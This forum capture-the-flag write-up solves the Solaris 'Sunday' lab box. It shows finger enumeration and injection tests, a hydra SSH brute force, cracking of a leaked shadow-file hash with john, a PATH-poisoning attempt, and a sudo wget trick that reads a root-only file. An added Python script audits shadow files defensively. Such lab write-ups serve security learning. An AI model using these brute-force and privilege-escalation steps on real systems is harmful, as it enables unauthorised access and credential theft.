Welcome to Hacking.BG!

Showing results for tags 'sunday'.

  1. h3xu

    Sunday

# Enumeration Stage

### NMAP

There is a firewall that is filtering our requests. To bypass it I have run the script with the -sS and -A tags.

1. sS (TCP SYN scan)

SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, and it is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works connection. You send a SYN packet, as if you are going to open a real connection, and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a is received. The port is also considered open if a SYN packet (without the ACK flag) is received in TCP connect scan is the default TCP scan type when SYN scan is not an option.

The service scan reveals five open ports.

```
# nmap -p- 10.10.10.76 -sV -sC -T4
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
```

### Port 79/tcp finger

**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files. [This website (hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it.

```
# finger <user>@10.10.10.76
Login       Name               TTY         Idle    When    Where
xvm      xVM User                          < .  .  .  . >
openldap OpenLDAP User                     < .  .  .  . >
nobody   NFS Anonymous Access              < .  .  .  . >
noaccess No Access User                    < .  .  .  . >
nobody4  SunOS 4.x NFS Anonym              < .  .  .  . >
```

###### metasploit finger user enumeration

We have already enumerated some users but it doesn't hurt to try the metasploit module too. From the output we understand that there is a mysql user too.

```
msf6 auxiliary(scanner/finger/finger_users) > run
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

###### Command injection test

```
# finger "/bin/ls -a /@10.10.10.76"
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???
# finger "|ls@10.10.10.76"
Login       Name               TTY         Idle    When    Where
|ls                   ???
```

### Port 111/tcp portmapper

In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack. You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible.

### Bruteforcing ssh service

Found password "sunday".

```
# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found
```

# Privilege Escalation

Logging in through ssh using sunny:sunday as username:password.

```
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$
```

Weird file:

```
sunny@sunday:/tmp$ cat ogl_select253
SUNWtext
mesa
NVDAnvda
nvidia
```

Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require a password to run. Upon running it, my guess is that it invokes a system call "id". Therefore I am creating a file (/bin/bash) with the name "id" and exporting the path to that file to be executed when invoked; therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.

```bash
sunny@sunday:/usr/share$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
sunny@sunday:/usr/share$ sudo /root/troll
testing
uid=0(root) gid=0(root)
sunny@sunday:/tmp/$ cp /bin/bash /tmp/id
sunny@sunday:/tmp/$ chmod 777 id
sunny@sunday:/tmp/$ echo $PATH
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
sunny@sunday:/tmp/$ export PATH=/tmp:$PATH
sunny@sunday:/tmp/$ sudo /root/troll
testing
uid=0(root) gid=0(root)
```

I have discovered a backup shadow file containing sammy's password hash.

```
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
```

By using john, I have managed to extract the password from the hash.

username:password == sammy:cooldude!

```
# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)
1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** for ***/usr/bin/wget***. According to [GTFO binaries](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files.

```
sunny@sunday:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
sunny@sunday:/tmp$ LFILE=/root/root.txt
sunny@sunday:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
sunny@sunday:/tmp$
```
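The pivotal finding in the post above is a world-readable copy of the shadow file in /backup, which handed over crackable sha256crypt hashes. The following is an added hardening check, not part of h3xu's post: it parses a shadow-format file using Solaris field conventions (`NP`, `*LK*`) and reports which accounts are exposed once such a copy leaks. The sample entries are constructed in the layout shown in the post; the hash values are placeholders.

```python
import stat

# Constructed sample in the layout of the /backup/shadow.backup shown in the
# post; the hash values are placeholders, not the ones from the box.
SAMPLE_SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
nobody:*LK*:6445::::::
sammy:$5$saltsalt$ConstructedPlaceholderHash0000000000000000:6445::::::
sunny:$5$saltsalt$ConstructedPlaceholderHash1111111111111111:17636::::::
"""

# crypt(3) prefixes: $5$ is what john reported for this file, plus its neighbours
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}

def classify_password_field(field: str) -> str:
    """Map the second shadow field to a state, using Solaris conventions."""
    if field == "NP":                      # Solaris: no password, non-login account
        return "no-password"
    if field.startswith("*LK*") or field in ("*", "!", "!!"):
        return "locked"
    if field == "":
        return "empty"                     # nothing to authenticate against at all
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "unknown-hash"

def audit_shadow_text(text: str) -> dict:
    """Parse shadow-format lines into {user: state}; malformed lines are skipped."""
    states = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or not parts[0]:
            continue
        states[parts[0]] = classify_password_field(parts[1])
    return states

def exposed_accounts(states: dict) -> list:
    """Accounts whose entry becomes offline-crackable (or directly usable) once the file leaks."""
    return sorted(u for u, s in states.items()
                  if s == "empty" or s.endswith("crypt") or s == "unknown-hash")

def is_world_readable(mode: int) -> bool:
    """True if the 'other' read bit is set; the backup in the post was readable by sunny."""
    return bool(mode & stat.S_IROTH)
```

To audit a real file, feed `open(path).read()` to `audit_shadow_text` and `os.stat(path).st_mode` to `is_world_readable`; a readable copy with any exposed account is the finding to remediate (restrict the mode, then rotate the affected passwords).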
